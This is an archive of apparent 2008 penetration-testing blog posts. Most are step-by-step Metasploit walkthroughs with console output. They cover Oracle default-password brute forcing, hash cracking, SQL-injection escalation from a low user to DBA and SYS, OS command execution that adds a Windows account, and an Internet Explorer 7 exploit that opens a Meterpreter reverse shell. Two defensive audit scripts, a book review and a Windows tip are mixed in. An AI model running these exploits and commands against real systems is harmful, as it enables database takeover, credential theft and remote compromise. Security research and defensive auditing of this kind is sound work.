Thursday, December 25, 2008

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought, what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and it's small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths", 3-4 pages in length, that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section, and each vignette, while short, yields some actionable information on the topic. I didn't have any specific favorites; they were all good. Just about all of them were real-world examples that the author conducted during security assessments, or real-life examples from people that had contacted the author or stories he had heard. It's sometimes much easier to empathize with Susan, who was a victim of identity theft, and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft, which tells you how to get rid of the pre-certified credit card offers, how to check your credit reports, what actions to take if you are a victim of identity theft, and some of the pitfalls that can come up during the process.

So why 4 stars? Well, mostly because I review technical security books, and it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other, more technical books are graded much more harshly. That being said, if I had approached it as a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to help them protect themselves from themselves and the rest of the bad guys out there, this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.


Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a default user account, or an account with an easy-to-guess username/password, for Oracle and taking that user to DBA via SQL injection in Oracle packages.

I've been neglecting the blog a bit while porting some of the public SQLi for Oracle into Metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, it being the week of Christmas (or whatever you celebrate), I thought I'd put out a module for a vulnerability that has been published but has no public exploit code.

So...coverage for:

The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.
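The two paragraphs above make the defender's point: exposure is not "who has the DBA role" but "who can reach EXECUTE on SYS.DBMS_DEFER_SYS through any chain of role grants". The script below is an added example (not code from the post or from Metasploit) that computes exactly that closure. On a real instance the three tables would be pulled from the DBA_TAB_PRIVS, DBA_ROLE_PRIVS and DBA_USERS views; the rows here are constructed to reproduce the chain the post describes (SCOTT -> DBA -> EXECUTE on the package) plus a nested role and a PUBLIC grant, and the names APP_RW, APP_ADMIN_ROLE, APP_SUPPORT and APP.ORDERS are made up.

```python
"""Audit who can reach EXECUTE on a SYS-owned package through role grants.

Added example, not code from the original post. In a real audit the rows
would come from the DBA_TAB_PRIVS, DBA_ROLE_PRIVS and DBA_USERS views; the
rows below are constructed to show the role chain the post describes
(DBA -> EXECUTE on SYS.DBMS_DEFER_SYS), not dumped from any instance.
"""
from collections import defaultdict

# Constructed rows in the shape of DBA_TAB_PRIVS: (grantee, owner, object, privilege)
TAB_PRIVS = [
    ("DBA", "SYS", "DBMS_DEFER_SYS", "EXECUTE"),   # the grant the post relies on
    ("PUBLIC", "SYS", "DBMS_OUTPUT", "EXECUTE"),   # PUBLIC grant: every user gets it
    ("APP_RW", "APP", "ORDERS", "SELECT"),         # hypothetical application grant
]

# Constructed rows in the shape of DBA_ROLE_PRIVS: (grantee, granted_role)
ROLE_PRIVS = [
    ("SCOTT", "DBA"),                    # the escalated account from the earlier posts
    ("SCOTT", "CONNECT"),
    ("APP_ADMIN_ROLE", "APP_RW"),        # a role granted to another role
    ("APP_SUPPORT", "APP_ADMIN_ROLE"),   # user -> APP_ADMIN_ROLE -> APP_RW
    ("HR", "CONNECT"),
]

# Constructed usernames (DBA_USERS), so users can be told apart from roles.
USERS = {"SCOTT", "APP_SUPPORT", "HR", "SYS", "SYSTEM"}


def expand_roles(grantee, role_privs):
    """Return every role reachable from grantee through nested grants (cycle-safe)."""
    graph = defaultdict(set)
    for who, role in role_privs:
        graph[who].add(role)
    seen, stack = set(), [grantee]
    while stack:
        current = stack.pop()
        for role in graph.get(current, ()):
            if role not in seen:
                seen.add(role)
                stack.append(role)
    return seen


def who_has_priv(owner, obj, priv, tab_privs, role_privs, users):
    """Map each user holding priv on owner.obj to the grantees it comes through.

    A user qualifies via a direct grant, via PUBLIC, or via any role in its
    transitive role set.
    """
    grantees = {g for g, o, t, p in tab_privs if (o, t, p) == (owner, obj, priv)}
    holders = {}
    for user in sorted(users):
        reachable = {user, "PUBLIC"} | expand_roles(user, role_privs)
        via = grantees & reachable
        if via:
            holders[user] = sorted(via)
    return holders


if __name__ == "__main__":
    hits = who_has_priv("SYS", "DBMS_DEFER_SYS", "EXECUTE", TAB_PRIVS, ROLE_PRIVS, USERS)
    for user, via in hits.items():
        print(f"{user} can EXECUTE SYS.DBMS_DEFER_SYS via {', '.join(via)}")
```

With the real views substituted for the constructed lists, the output is the list of accounts whose EXECUTE grant on the package needs reviewing; anyone on it who does not need deferred-transaction administration is a candidate for a revoke, and the same walk answers the equivalent question for any other SYS package named in an advisory.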

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

------------------------------ ------------------------------ --- --- ---

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@ as sysdba

SQL*Plus: Release - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release - Production
With the Partitioning, OLAP and Data Mining options


select user from dual;



Tested on 9i and 10g release 1

codez available here:

It's definitely a work in progress, so if you have feedback, send it.

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

I was doing some incident response on a Windows 2003 server and needed to verify the service pack level and installed KBs via Add/Remove Programs, but the icon was missing.

Found the answer: you can call it directly via Start --> Run --> appwiz.cpl.


Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time figuring it out. It's pretty straightforward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the XML, which causes heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an initial PoC working, but it was not stable and only triggered on XP, as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on the user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning, it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate on the heap, the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
msf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened ( ->
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debugging and testing. Cheers mc!!

Now all I need is a target... ;)


IE7 Zero Day Technical Analysis

dean de beer

Sunday, December 7, 2008

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their Netscreen hacking talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances"

Monday, November 24, 2008

Metasploit and WMAP

What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not built around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:

Step 1: Download, patch, and install ratproxy

Code (at time of this posting):

Step 2: Run ratproxy and browse the site you are targeting; this populates the database that wmap will use.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db

Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db

Show the targets. This is populated by browsing a site with ratproxy.

msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 80 0
[*] Added. 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 80 0
[*] Added. 80 0
[*] Done.

Select a target and run the print command again to ensure the right target was selected.

msf > wmap_targets -s 1
Host Port SSL

[*] => 1. 80

[*] 2. 80

[*] Done.

Display the website structure.

msf > wmap_website
[*] Website structure
[*] SSL:0
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.

[*] Usage: wmap_run [options]
-h Display this help text

-t Show all matching exploit modules

-e Launch exploits against all matched targets

Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.

Run wmap, then go get a (rum &) coke, because the brute-force directory modules are going to take a while.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against
[*] Error:
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against
[*] may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against
[*] is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against
[*] allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against
[*] is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against


msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display

Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)

1. Sat Nov 22 22:37:04 -0500 2008,80,0

[*] Done.

Show your report.

msf > wmap_reports -s 1
WMAP REPORT:,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.

Finish your pwnage...errr pentest.
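The wmap_reports dump above is flat text, one finding per line, which is fine to read once but awkward to act on across a few dozen hosts. Here is an added example (not from the post and not part of WMAP) that parses that line format into findings, pairs each DIRECTORY NAME line with the RESP_CODE line that follows it, and triages the result from the defender's side: directories answering 200 and vulnerabilities ranked by severity. The sample lines are a subset of the report shown above (the host column was not in the post, so it is omitted); the high/medium ranking is our own, not WMAP's.

```python
"""Parse a wmap_reports dump into findings and triage them.

Added example, not part of the original post or of WMAP itself. The sample
lines are copied from the report shown above in the shape WMAP printed them
(the host part of the target was not in the post and is omitted here).
"""
import re

SAMPLE_REPORT = """\
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
"""

# Every finding line is "<KIND> <ATTR>: <value> [free text] [<timestamp>]".
LINE_RE = re.compile(
    r"^(?P<kind>\w+) (?P<attr>\w+): (?P<value>\S+)(?: (?P<note>.*?))? \[(?P<ts>[^\]]+)\]$"
)

# Ranking used for triage; this ordering is our own assumption, not WMAP's.
SEVERITY = {"PUT_ENABLED": "high", "DIR_LISTING": "medium"}
RANK = ("high", "medium", "low")


def parse_report(text):
    """Turn report lines into dicts. A DIRECTORY NAME line is paired with the
    DIRECTORY RESP_CODE line that follows it; non-matching lines are skipped."""
    findings, pending_dir = [], None
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:  # "[*] Done." and anything else that is not a finding
            continue
        kind, attr, value, note, ts = m.group("kind", "attr", "value", "note", "ts")
        if kind == "WEB_SERVER":
            banner = f"{value} {note}" if note else value
            findings.append({"type": "server", "value": banner, "ts": ts})
        elif kind == "DIRECTORY" and attr == "NAME":
            pending_dir = {"type": "directory", "path": value, "status": None, "ts": ts}
            findings.append(pending_dir)
        elif kind == "DIRECTORY" and attr == "RESP_CODE" and pending_dir is not None:
            pending_dir["status"] = int(value)
            pending_dir = None
        elif kind == "VULNERABILITY":
            findings.append({"type": "vuln", "name": attr, "path": value,
                             "detail": note or "", "ts": ts})
    return findings


def triage(findings):
    """What a defender acts on: directly reachable directories and vulns by severity."""
    exposed = [f["path"] for f in findings
               if f["type"] == "directory" and f["status"] == 200]
    vulns = [(SEVERITY.get(f["name"], "low"), f["name"], f["path"])
             for f in findings if f["type"] == "vuln"]
    vulns.sort(key=lambda v: RANK.index(v[0]))
    return {"exposed_directories": exposed, "vulnerabilities": vulns}


if __name__ == "__main__":
    result = triage(parse_report(SAMPLE_REPORT))
    for sev, name, path in result["vulnerabilities"]:
        print(f"[{sev}] {name} at {path}")
    print("reachable directories:", ", ".join(result["exposed_directories"]))
```

PUT_ENABLED is ranked first on purpose: a web root that accepts HTTP PUT is an arbitrary-upload path and is fixed on the server side (remove PUT/DELETE from the methods the server allows on that location), whereas a directory listing is an information disclosure fixed with an Options -Indexes style setting. Feeding several reports through the same parser gives one table to hand to the people who own the servers.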

Sunday, November 23, 2008

Getting your smartcard to work with Ubuntu

The big bummer of Common Access Cards (CAC) is that there hasn't been a really good solution to get them working in Linux. I've seen it done for OS X but not for Linux. Well, the guys over at HR Geeks did a writeup on how to get it working; worth a look if you have made the jump to being full-time Linux.

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.

I used the john from this site:

cg@segfault:~/evil/john/run$ more oraclehashes

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.


Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST


msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.

Version: $Revision:$

Provided by:

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable

SID => unbreakable

msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the Adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.

Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. Something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again, and it should play at the proper speed. You can also click the link below the video for a bigger view.

Wednesday, November 19, 2008

Oracle Pwnage Part 3

Sorry no metasploit for this one.


I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:

Second thing: you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security.

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5

Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2

Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...


[*] Done...

[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/

use auxiliary/sqli/oracle/ctxsys_driload

use auxiliary/sqli/oracle/dbms_export_extension

use auxiliary/sqli/oracle/dbms_metadata

use auxiliary/sqli/oracle/lt_findricset

use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension

msf auxiliary(dbms_export_extension) > info

Version: $Revision:$

Provided by:


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

DBA SCOTT no DB user to elevate to DBA.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module will escalate a Oracle DB user to DBA by exploiting an

sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST


msf auxiliary(dbms_export_extension) > set SID
SID =>
msf auxiliary(dbms_export_extension) > run

[*] Sending package...

[*] Done...

[*] Sending body...

[*] Done...

[*] Sending declare...

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(dbms_export_extension) >

Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...

[*] Auxiliary module execution completed

Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"

SQL => select * from user_role_privs

msf auxiliary(oracle_sql) > run

[*] Sending SQL...


<-- Yup it worked :-)

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_sql) >

From there we can use the oracle_win32 auxiliary module to execute commands

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:


Basic options:

Name Current Setting Required Description

---- ------------- -------- -----------

CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"

CMD => net user dba P@ssW0rd1234 /add

msf auxiliary(oracle_win32) > set SID
SID =>
msf auxiliary(oracle_win32) > set RHOST


msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...

[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'

[*] Done...

[*] Auxiliary module execution completed

Or you can test that you are actually executing commands by pinging a box you control:

msf auxiliary(oracle_win32) > set CMD "ping"
CMD => ping

msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'ping'

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_win32) >

On the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

01:11:26.123515 IP > ICMP echo request, id 0, seq 8192, length 40

01:11:26.343528 IP > ICMP echo reply, id 0, seq 8192, length 40


8 packets captured
